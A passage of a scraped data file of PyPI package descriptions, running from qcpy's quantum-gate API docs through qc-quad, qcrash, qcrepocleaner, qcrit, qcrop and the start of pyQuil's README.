]# [ 0.5-0.j ]# [ 0. +0.j ]# [ 0.5-0.j ]# [ 0. +0.j ]# [-0. +0.j ]# [ 0. +0.5j]]quantumcircuit.rc3x(qubit_1: int,qubit_2: int,qubit_3: int,qubit_4: int)A 4-qubit quantum gate that takes in 4 unique qubits.Parameters:qubit_1 (int)- first input qubit.qubit_2 (int)- second input qubit.qubit_3 (int)- third input qubit.qubit_4 (int)- fourth input qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(4)qc.h(0)qc.h(1)qc.h(2)qc.rc3x(0,1,2,3)print(qc.state)# [[ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0. +0.354j]# [-0. +0.j ]# [ 0. 
-0.j ]# [-0.354+0.j ]]quantumcircuit.cnot(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.cr(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cr(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.cz(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cz(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.swap(qubit_1: int,qubit_2: int)A 2-qubit quantum gate that takes in 2 qubits to swap there properties.Parameters:qubit_1 (int)- first qubit to swap.qubit_2 (int)- second qubit to swap.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.swap(0,1)print(qc.state)# [[0.707+0.j]# [0.707+0.j]# [0. +0.j]# [0. +0.j]]quantumcircuit.rxx(qubit_1: int,qubit_2: int,theta: float=numpy.pi/2)A 2-qubit quantum gate that takes in two qubits and a representation of theta to initialize in the quantum state.Parameters:qubit_1 (int)- first qubit input.qubit_2 (int)- second qubit input.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rxx(0,1)print(qc.state)# [[0.5+0.j ]# [0. -0.5j]# [0.5+0.j ]# [0. -0.5j]]quantumcircuit.rzz(qubit_1,qubit_2,theta=numpy.pi/2)A 2-qubit quantum gate that takes in two qubits and a representation of theta to initialize in the quantum state.Parameters:qubit_1 (int)- first qubit input.qubit_2 (int)- second qubit input.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rxx(0,1)print(qc.state)# [[0.5+0.j ]# [0. -0.5j]# [0.5+0.j ]# [0. -0.5j]]quantumcircuit.customcontrolled(control: int,target: int,custom_matrix: np.array)Used to insert single qubit based quantum gates to have a control qubit apart of it and committing to the quantum state.Parameters:control (int)- control qubit for given matrix.target (int)- target qubit for given matrix.custom_matrix (np.array)- (2,2) matrix to be applied to the quantum circuit.Returns:NoneExample:fromqcpyimportquantumcircuit,paulixqc=quantumcircuit(2)qc.h(0)qc.customcontrolled(0,1,paulix())print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. 
+0.j]# [0.707+0.j]]quantumcircuit.i(qubit: int)Used to confirm value that a qubit is representing and does nothing to manipulate the value of such qubit.Parameters:qubit (int)- the qubit to have the identity gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.i(0)print(qc.state)# [[1.+0.j]# [0.+0.j]# [0.+0.j]# [0.+0.j]]quantumcircuit.x(qubit: int)Used to invert the value of what a qubit is representing.Parameters:qubit (int)- the qubit to have the Pauli-X gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.x(0)print(qc.state)# [[0.+0.j]# [0.+0.j]# [1.+0.j]# [0.+0.j]]quantumcircuit.hadmard(qubit: int)Used to put a given qubit into superposition.Parameters:qubit (int)- the qubit to have the Hadamard gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.y(qubit: int)Changes the state of a qubit by pi around the y-axis of a Bloch Sphere.Parameters:qubit (int)- the qubit to have the Pauli-Y gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.y(0)print(qc.state)# [[0.+0.j]# [0.+0.j]# [0.+1.j]# [0.+0.j]]quantumcircuit.z(qubit: int)Changes the state of a qubit by pi around the z-axis of a Bloch Sphere.Parameters:qubit (int)- the qubit to have the Pauli-Z gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.z(0)print(qc.state)# [[ 0.707+0.j]# [ 0. +0.j]# [-0.707+0.j]# [ 0. +0.j]]quantumcircuit.phase(qubit: int,theta: float=numpy.pi/2)Commits to a rotation around the z-axis based off of the inputted theta value.Parameters:qubit (int)- the qubit to have the Phase gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.phase(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. +0.707j]# [0. +0.j ]]quantumcircuit.s(qubit: int)Is a Phase gate where the inputted theta value is given as a constant of theta = pi / 2.Parameters:qubit (int)- the qubit to have the Pauli-Z gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.s(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. +0.707j]# [0. +0.j ]]quantumcircuit.sdg(qubit: int)Is a Phase gate and inverse of the S gate where the inputted theta value is given as a constant of theta = -pi / 2.Parameters:qubit (int)- the qubit to have the Sdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.sdg(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. -0.707j]# [0. +0.j ]]quantumcircuit.t(qubit: int)T gate is a special use case gate that in implemented from the P Gate.Parameters:qubit (int)- the qubit to have the T gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.t(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0.5 +0.5j]# [0. +0.j ]]quantumcircuit.tdg(qubit: int)Tdg gate is a special use case gate that in implemented from the P Gate and is the inverse of the T gate.Parameters:qubit (int)- the qubit to have the Tdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.tdg(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0.5 -0.5j]# [0. 
+0.j ]]quantumcircuit.rz(qubit: int,theta: float=numpy.pi/2)RZ gate commits a rotation around the z-axis for a qubit.Parameters:qubit (int)- the qubit to have the Rz gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rz(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. +0.j ]]quantumcircuit.ry(qubit: int,theta: float=numpy.pi/2)RY gate commits a rotation around the y-axis for a qubit.Parameters:qubit (int)- the qubit to have the Ry gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around y-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.ry(0)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.rx(qubit: int,theta: float=numpy.pi/2)RX gate commits a rotation around the x-axis for a qubit.Parameters:qubit (int)- the qubit to have the Ry gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around x-axis.Returns:NoneExample:fromqcpyimportquantumCircuitqc=quantumcircuit(2)qc.rx(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. -0.707j]# [0. +0.j ]]quantumcircuit.sx(qubit: int)SX gate is the square root of the Inverse gate (X, PauliX Gate).Parameters:qubit (int)- the qubit to have the Sx gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.sx(0)print(qc.state)# [[0.5+0.5j]# [0. +0.j ]# [0.5-0.5j]# [0. +0.j ]]quantumcircuit.sxdg(qubit: int)SXDG gate is the negative square root of the Inverse gate (X, PauliX Gate) and inverse of the SX gate.Parameters:qubit (int)- the qubit to have the SXdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.sxdg(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. +0.j ]]quantumcircuit.u(qubit: int,theta: float=numpy.pi/2,phi: float=numpy.pi/2,lmbda: float=numpy.pi/2)U gate is given three inputs (theta, phi, and lambda) that allow the inputs to manipulate the base matrix to allow for the position of the enacted qubit around the bloch sphere representation.Parameters:qubit (int)- the qubit to have the U gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.phi (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.lmbda (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.u(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. 
+0.j ]]quantumcircuit.custom(qubit: int,custom_matrix: np.array)Will take in a custom single qubit quantum gate and implement it on a qubit.Parameters:qubit (int)- the qubit to have the U gate be applied to the quantum wire.custom_matrix (np.array)- matrix to be applied to the quantum circuit.Returns:NoneExample:fromqcpyimportquantumcircuit,paulixqc=quantumcircuit(2)qc.custom(0,paulix())print(qc.state)# [[0.+0.j]# [0.+0.j]# [1.+0.j]# [0.+0.j]]VisualizerA collection of classes to visualize the quantum circuitclassqcpy.qsphere(circuit)Visualizes the quantum circuit as a q-sphereParameters:circuit- the quantum circuitAttributes:Noneqsphere.make(path: str=\"qsphere.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a Q-Sphere that plots a global visualization of the quantum states in a 3D global viewParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the sphere to be shown instead of saveddarkmode (bool)- pass True for darkmode, false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,qsphereqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)sphere_ex=qsphere(qc)sphere_ex.make(save=False,show=True)classqcpy.bloch(circuit)Visualizes the quantum state of a single qubit as a sphereParameters:circuit- the quantum circuitAttributes:Noneblochsphere.make(show_bit: int=0,path: str=\"qsphere.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a Bloch Sphere that plots the quantum state of a single qubit in a 3D global viewParameters:show_bit (int)- the qubit on the circuit to be visualized, initialized as the 0th bitpath (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the sphere to be shown instead of saveddarkmode (bool)- pass True for darkmode, false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,blochqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)sphere_ex=bloch(qc)sphere_ex.make(show_bit=1,save=False,show=True)classqcpy.statevector(circuit)Visualizes the quantum circuit's quantum amplitutes using a bar graphParameters:circuit- the quantum circuitAttributes:Nonestatevector.make(path: str=\"statevector.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a graph that plots all the amplitudes of the qubits being measuredParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the graph to be shown instead of saveddarkmode (bool)- pass True for darkmode and false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,statevectorqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)statevector(qc).make(save=False,show=True)classqcpy.probability(circuit)Visualizes the quantum circuit's qubits probability of being measured using a bar graphParameters:circuit- the quantum circuitAttributes:Noneprobability.make(path: str=\"probability.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a graph that plots all the probabilities of the qubits being measuredParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the graph to be shown instead of saveddarkmode (bool)- pass True for darkmode and false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,probabilityqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)probability(qc).make(save=False,show=True)"} +{"package": "qc-qiskit", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qcqp", "pacakge-description": "A CVXPY extension for nonconvex quadratically constrained quadratic programs."} +{"package": "qc-quad", "pacakge-description": "qc-quad: Quantum-chemistry quadrature package. This package makes it easy to set up so-called Lebedev-Laikov and Gauss-Legendre grids. These grids are suitable for numerical integration in quantum chemistry applications. Lebedev-Laikov grids provide coordinates and weights for an optimal integration over the surface of a unit sphere. These grids are the gold standard in quantum chemistry because of their accuracy and the minimal number of integrand-function evaluations. The implementation of the grids is derived from a Matlab implementation by John Burkardt https://people.sc.fsu.edu/~jburkardt/m_src/sphere_lebedev_rule/sphere_lebedev_rule.html. Gauss-Legendre grids provide coordinates and weights for an optimal integration in one dimension, over a finite segment. The Gauss-Legendre grids are suitable for generic functions. This is in contrast to the behavior of wave-functions along the radial distance. However, I provide these grids here in order to organize an integration of generic functions over spherical volumes. This integration maintains a nearly constant density of integration points over a ball volume. This integration was useful in computing atomic contributed volumes https://www.tandfonline.com/doi/abs/10.1080/00268979100100941 in my first-principle tools https://first-principle-tools.ew.r.appspot.com. A motivation for composing this package instead of using several packages out there in the open-source community would be \"doing things right\", in a testable, malleable, maintainable, cross-platform and parsimonious way. There are several open-source implementations of Lebedev-Laikov grids. The quantum-chemistry package Horton uses a Python binding to a C++ module implementing the grids https://github.com/theochem/horton. A sub-repository grid of the theochem repositories offers the Lebedev-Laikov grids stored in .npy files. There is an exhaustive set of quadratures in the repository https://github.com/sigma-py/quadpy. However, the code of quadpy is obfuscated. The repository https://github.com/Rufflewind/lebedev_laikov provides the grids via a Python binding to a source code in the C language. Similarly, https://github.com/dftlibs/numgrid provides the grids through a binding to a Fortran source. There is a pure Python implementation of Lebedev-Laikov grids https://github.com/gabrielelanaro/pyquante/. However, it provides only the first 11 grids (6, 14, 26, 38, 50, 74, 86, 110, 146, 170, 194 points) out of the 32 grids implemented by Dmitri Laikov. Finally, there is an issue in SciPy with a feature request for Lebedev grids https://github.com/scipy/scipy/issues/11929. The current package qc-quad is open source. It provides all 32 Lebedev-Laikov grids published by Dmitri Laikov. It is a pure Python package. This makes the implementation easily testable (pytest), extendable and usable.\nReferences:\nAxel Becke, \"A multicenter numerical integration scheme for polyatomic molecules\", Journal of Chemical Physics, Volume 88, Number 4, 15 February 1988, pages 2547-2553.\nVyacheslav Lebedev, Dmitri Laikov, \"A quadrature formula for the sphere of the 131st algebraic order of accuracy\", Russian Academy of Sciences Doklady Mathematics, Volume 59, Number 3, 1999, pages 477-481.\nLawrence R. Dodd & Doros N. Theodorou, \"Analytical treatment of the volume and surface area of molecules formed by an arbitrary collection of unequal spheres intersected by planes\", Molecular Physics, 72:6, 1991, pages 1313-1345, DOI: 10.1080/00268979100100941.\nInstallation: pip install qc-quad. Developer installation: installation can be done with poetry = \"^1.3.1\": poetry install. Usage: this is a part of some quantum-chemistry software; some use cases can be seen in the tests. Roadmap: let's see what the community thinks, but here are two points worth noting. Note that to become a truly quantum-chemical quadrature this package needs a smooth separation of space which depends on the geometry of the molecule. Please see the works by Axel Becke and onwards. Perhaps a one-dimensional grid suitable for integrating exponentially decaying functions, together with a pruning scheme for the Lebedev-Laikov grids, would be suitable in this package. This should be easy to bolt in later for somebody who needs it. The major difficulty in setting up the Lebedev-Laikov grids is the absence of a definition for an arbitrary number of points. The grids are provided for a minimum of 6 and a maximum of 5810 points: 6, 14, 26, 38, 50, 74, 86, 110, 146, 170, 194, 230, 266, 302, 350, 434, 590, 770, 974, 1202, 1454, 1730, 2030, 2354, 2702, 3074, 3470, 3890, 4334, 4802, 5294 and 5810, 32 grids in total. Each of the 32 grids is composed of a set of 6 kinds of grids of 6, 12, 8, 24, 24 and 48 points. To the best of my knowledge, no open-source implementation offers any generalizations. For example, the construction of grids with more points by attaching 48-point grids together, or the construction of a 36-point grid from three of the 12-point grids, is not implemented although it should be feasible. Contributing: PEP8 code formatting is mandatory. Bug fixes are welcome. Small improvements are welcome. A definition of the hard-coded coefficients is especially welcome. Authors and acknowledgment: James Talman (https://www.sciencedirect.com/science/article/abs/pii/0010465583901261) drew my attention to the Lebedev-Laikov grids. License: MIT license, no guarantee, free to use anywhere. Project status: initial release is done."} +{"package": "qcrandom", "pacakge-description": "qcrandom: Overview: qcrandom is a Python library which provides an easy way to generate random numbers on quantum computers. Quantum computers allow us to generate truly random numbers. Setup: setup instructions are available here. Learn: check out our Wiki page! Any problems? If you find a bug, feel free to post an issue!"} +{"package": "qcrash", "pacakge-description": "About: a PyQt/PySide framework for reporting application crashes (unhandled exceptions) and/or letting the user report an issue/feature request. Features: multiple builtin backends for reporting bugs (github_backend lets you create issues on GitHub; email_backend lets you send an email with the crash report); highly configurable, you can create your own backend, set your own formatter, ...; a thread-safe exception hook mechanism with a way to set up your own function. Screenshots (taken on KDE Plasma 5): report dialog, review report before submitting, GitHub integration. LICENSE: QCrash is licensed under the MIT license. Installation: pip install qcrash. Usage, basic usage:\nimport qcrash.api as qcrash\n# setup our own function to collect system info and application log\nqcrash.get_application_log = my_app.get_application_log\nqcrash.get_system_information = my_app.get_system_info\n# configure backends\ngithub = qcrash.backends.GithubBackend('ColinDuquesnoy', 'QCrash')\nemail = qcrash.backends.EmailBackend('colin.duquesnoy@gmail.com')\nqcrash.install_backend([github, email])\n# install exception hook\nqcrash.install_except_hook()\n# or show the report dialog manually\nqcrash.show_report_dialog()\nSome more detailed examples are available. Also have a look at the API documentation. Dependencies: keyring, githubpy (embedded into the package). Testing: to run the tests, just run the following command: python setup.py test"} +{"package": "qc-remote", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcrepocleaner", "pacakge-description": "Here are the tools to clean up the CCDB of the QC. Entry point: it is o2-qc-repo-cleaner. See the long comment at the beginning. Usage: o2-qc-repo-cleaner [-h] [--config CONFIG] [--config-git] [--config-consul CONFIG_CONSUL] [--log-level LOG_LEVEL] [--dry-run] [--only-path ONLY_PATH] [--workers WORKERS]. Configuration: the file config.yaml contains the CCDB URL and the rules to be followed to clean up the database. An example is provided along this README (config.yaml). A typical rule in the config file looks like:\n- object_path: qc/ITS/.*\n  delay: 240\n  policy: 1_per_hour\nThere can be any number of these rules. The order is important as we use the first matching rule for each element in the QCDB (caveat the use of the flag continue_with_next_rule, see below). object_path: a pattern to be matched to know if the rule applies. delay: the duration in minutes of the grace period during which an object is not removed, even if it matches the above path. policy: the name of a policy to apply on the matching objects. Here are the currently available policies (full description in the corresponding files): 1_per_hour: keep the first and extend its validity to 1 hour, remove everything in the next hour, repeat. 1_per_run: requires the \"Run\" or \"RunNumber\" metadata to be set; keep only the most recent version of an object for a given run. last_only: keep only the last version, remove everything else. none_kept: keep none, remove everything. skip: keep everything. from_timestamp: the rule only applies to versions whose valid_from is older than this timestamp. to_timestamp: the rule only applies to versions whose valid_from is younger than this timestamp. continue_with_next_rule: if True, the next matching rule is also applied. xyz: any extra argument necessary for a given policy.
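To make the rule format concrete, here is one illustrative configuration that combines several of these fields; the paths, delays and timestamp below are invented for the example and are not taken from the package's own documentation:\n- object_path: qc/ITS/.*\n  delay: 240                      # grace period in minutes\n  policy: 1_per_hour\n  continue_with_next_rule: True   # the next matching rule is also applied\n- object_path: qc/ITS/Clusters/.*\n  delay: 1440\n  policy: 1_per_run\n  delete_when_no_run: True        # extra, policy-specific argument (hypothetical value)\n  from_timestamp: 1577836800000   # illustrative value; see the package docs for the expected unit\n- object_path: .*\n  delay: 120\n  policy: last_only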
This is the case of the argument delete_when_no_run required by the policy 1_per_run. The configuration for ccdb-test is described here. Unit Tests: cd QualityControl/Framework/script/RepoCleaner ; python3 -m unittest discover, and to test only one of them: python3 -m unittest tests/test_NewProduction.py -k test_2_runs. In particular there is a test for the production rule that is pretty extensive. It hits the ccdb though and it needs the following path to be truncated: qc/TST/MO/repo/test*. Other tests: most of the classes and Rules have a main to help test them. To run do e.g. python3 1_per_run.py. Installation: CMake will install the python scripts in bin and the config file in etc. Example: PYTHONPATH=./rules:$PYTHONPATH ./o2-qc-repo-cleaner --dry-run --config config-test.yaml --dry-run --only-path qc/DAQ --log-level 10. Development: to install locally, cd Framework/script/RepoCleaner\npython3 -m pip install .\nUpload new version: Prerequisite: create an account on https://pypi.org. Create new version: update version number in setup.py, then python3 setup.py sdist bdist_wheel and python3 -m twine upload --repository pypi dist/*"} +{"package": "qcri", "pacakge-description": "UNKNOWN"} +{"package": "qcri-cyber-commons", "pacakge-description": "No description available on PyPI."} +{"package": "qcrit", "pacakge-description": "Easily extract features from texts, and run machine learning algorithms on them. Write your own features, use ours, or do both! https://www.qcrit.org Installation: with pip: pip install qcrit; with pipenv: pipenv install qcrit. About: The qcrit package contains utilities to facilitate processing and analyzing literature. To try extracting some features, just replace 'your-directory-name' with the name of a directory of .txt files. Everything else is taken care of!\nfrom qcrit.extract_features import main\nfrom qcrit.textual_feature import setup_tokenizers\nimport qcrit.features.universal_features\nsetup_tokenizers(terminal_punctuation=('.', '!', '?'))\nmain(corpus_dir='your-directory-name', file_extension_to_parse_function={'txt': lambda filename: open(filename).read()})\nWriting Your Own Features: A feature is a number that results from processing literature. An example of a feature might be the number of definite articles, the mean sentence length, or the fraction of interrogative sentences. The word \"feature\" can also refer to a python function that computes such a value. Normally to compute features, you must 1) obtain a corpus of texts, 2) traverse each text in the corpus, 3) parse the text into tokens, 4) write logic to calculate features, and 5) output the results to the console or to a file. Also, this will run slowly unless you 6) cache tokenized text for features that use the same tokens. With the textual_feature decorator, steps (2), (3), (5), and (6) are abstracted away - you just need (1) to supply the corpus. Once you have written a feature as a python function, label it with the decorator textual_feature. Your feature must have exactly one parameter which is assumed to be the parsed text of a file.\nfrom qcrit.textual_feature import textual_feature\n@textual_feature()\ndef count_definite_article(text):\n    return text.count('the')\nThe textual_feature decorator takes an argument that represents the type of tokenization. There are four supported tokenization_types: 'sentences', 'words', 'sentence_words' and None.
This tells the function in\nwhat format it will receive the'text'parameter.IfNone, the function will receive the text parameter as a string.If'sentences', the function will receive the text parameter as a list of sentences, each as a stringIf'words', the function will receive the text parameter as a list of wordsIf'sentence_words', the function will recieve the text parameter as a list of sentences, each as a list of wordsfromfunctoolsimportreduce@textual_feature(tokenize_type='sentences')defmean_sentence_len(text):sen_len=reduce(lambdacur_len,cur_sen:cur_len+len(cur_sen),text,0)num_sentences=len(text)returnsen_len/num_sentencesExtracting FeaturesUseqcrit.extract_features.mainto run all the functions labeled with the@textual_featuredecorator and output results into a file.corpus_dir- the directory to search for files containing texts, this will traverse all sub-directories as wellfile_extension_to_parse_function- map from file extension (e.g. 'txt', 'tess') of texts that you would like to parse to a function directing how to parse itoutput_file- the file to output the results into, created to be analyzed during machine learning phaseIn order for sentence tokenization to work correctly,setup_tokenizers()must be called with the\nterminal punctuation marks of the language being analyzed. You can also optionally supply the name of the language as well. If data exists about how to parse the language, this may improve sentence tokenization.fromqcrit.extract_featuresimportmain,parse_tessfromqcrit.textual_featureimportsetup_tokenizersfromsomewhere_elseimportcount_definite_article,mean_sentence_lensetup_tokenizers(terminal_punctuation=('.','!','?'),language='greek')main(corpus_dir='demo',file_extension_to_parse_function={'tess':parse_tess},output_file='output.pickle')Output:Extractingfeaturesfrom.tessfilesindemo/100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588|4/4[00:00<00:00,8.67it/s]Featureminingcomplete.Attemptingtowritefeatureresultsto\"output.pickle\"...\nSuccess!\n\n\nFeatureminingelapsedtime:1.4919secondsAnalysisUse the@model_analyzer()decorator to label functions that analyze machine learning modelsInvokeanalyze_models.main('output.pickle', 'classifications.csv')to\nrun all functions labeled with the@model_analyzer()decorator. 
To run only one function, include\nthe name of the function as the third parameter to analyze_models.main()output.pickle: Now that the features have been extracted and output into output.pickle, we\ncan use machine learning models on them.classifications.csv: The file classifications.csv contains the name of the file in the first column\nand the particular classification (prose or verse) in the second column for every file in the corpus.importqcrit.analyze_modelsfromqcrit.model_analyzerimportmodel_analyzerfromsklearnimportensemblefromsklearn.model_selectionimporttrain_test_splitfromsklearn.metricsimportaccuracy_score@model_analyzer()deffeature_rankings(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier feature rankings\\n')features_train,features_test,labels_train,_=train_test_split(data,target,test_size=0.5,random_state=0)clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)clf.predict(features_test)#Display features in order of importanceprint('Feature importances:')fortupinsorted(zip(feature_names,clf.feature_importances_),key=lambdas:-s[1]):print('\\t%f:%s'%(tup[1],tup[0]))@model_analyzer()defclassifier_accuracy(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier accuracy\\n')features_train,features_test,labels_train,labels_test=train_test_split(data,target,test_size=0.5,random_state=0)clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)results=clf.predict(features_test)print('Stats:')print('\\tNumber correct: '+str(accuracy_score(labels_test,results,normalize=False))+' / '+str(len(results)))print('\\tPercentage correct: '+str(accuracy_score(labels_test,results)*100)+'%')@model_analyzer()defmisclassified_texts(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier misclassified texts\\n')features_train,features_test,labels_train,labels_test,idx_train,idx_test=train_test_split(data,target,range(len(target)),test_size=0.5,random_state=0)print('Train texts:\\n\\t'+'\\n\\t'.join(file_names[i]foriinidx_train)+'\\n')print('Test texts:\\n\\t'+'\\n\\t'.join(file_names[i]foriinidx_test)+'\\n')clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)results=clf.predict(features_test)print('Misclassifications:')fori,_inenumerate(results):ifresults[i]!=labels_test[i]:print('\\t'+file_names[idx_test[i]])qcrit.analyze_models.main('output.pickle','classifications.csv')Output:----------------------------------------\nRandom Forest Classifier feature rankings\n\nFeature importances:\n\t0.400000: num_conjunctions\n\t0.400000: num_interrogatives\n\t0.200000: mean_sentence_length\n\n\nElapsed time: 0.0122 seconds\n\n----------------------------------------\nRandom Forest Classifier accuracy\n\nStats:\n\tNumber correct: 1 / 2\n\tPercentage correct: 50.0%\n\n\nElapsed time: 0.0085 seconds\n\n----------------------------------------\nRandom Forest Classifier misclassified texts\n\nTrain texts:\n\tdemo/aristotle.poetics.tess\n\tdemo/aristophanes.ecclesiazusae.tess\n\nTest texts:\n\tdemo/euripides.heracles.tess\n\tdemo/plato.respublica.part.1.tess\n\nMisclassifications:\n\tdemo/plato.respublica.part.1.tess\n\n\nElapsed time: 0.0082 secondsDevelopmentEnsure that you havepipenvinstalled. 
Also, ensure that you have a version ofpythoninstalled that matches the version in thePipfile.Setup a virtual environment and install the necessary dependencies:PIPENV_VENV_IN_PROJECT=truepipenvinstall--devActivate the virtual environment:pipenvshellNow,pythoncommands will use the dependencies andpythonversion from the virtual environment. Useexitto leave the virtual environment, and usepipenv shellwhile in the project directory to activate it again.Demopythondemo/demo.pySubmissionThe following commands will submit the package to thePython Package Index. Before running them, it may be necessary to increment the version number in__init__.pyand to delete any previously generateddist/,build/, andegg-infodirectories if they exist.pythonsetup.pybdist_wheelsdist\ntwineuploaddist/*"} +{"package": "qcrop", "pacakge-description": "QCropA basic PyQt image cropping tool.Installpip install qcropUsageAs an applicationStart with the command:qcrop path/to/image.extThe supported image formats arethose handled by the Qt framework: BMP, GIF, JPG, PNG, PBM, PGM, PPM, XBM and XPM.As a python moduleSample code:fromPyQt5.QtGuiimportQPixmapfromqcrop.uiimportQCroporiginal_image=QPixmap(...)crop_tool=QCrop(original_image)status=crop_tool.exec()ifstatus==Qt.Accepted:cropped_image=crop_tool.image# else crop_tool.image == original_imageUser interfaceUse the mouse to select the image area to crop. You can also use the X, Y, Width and Height fields to precisely adjust the area (you can use mouse wheel hovering the field).Click the reset button to set the crop area to the full image.Once done click ok to validate the crop, cancel to go back to the original image."} +{"package": "qcs", "pacakge-description": "pyQuilA library for easily generating Quil programs to be executed using the Rigetti Forest platform.\npyQuil is licensed under theApache 2.0 license.DocumentationDocumentation is hosted athttp://pyquil.readthedocs.io/en/latest/InstallationYou can install pyQuil as a conda package (recommended):condainstall-crigettipyquilor usingpip:pip install pyquilTo instead install 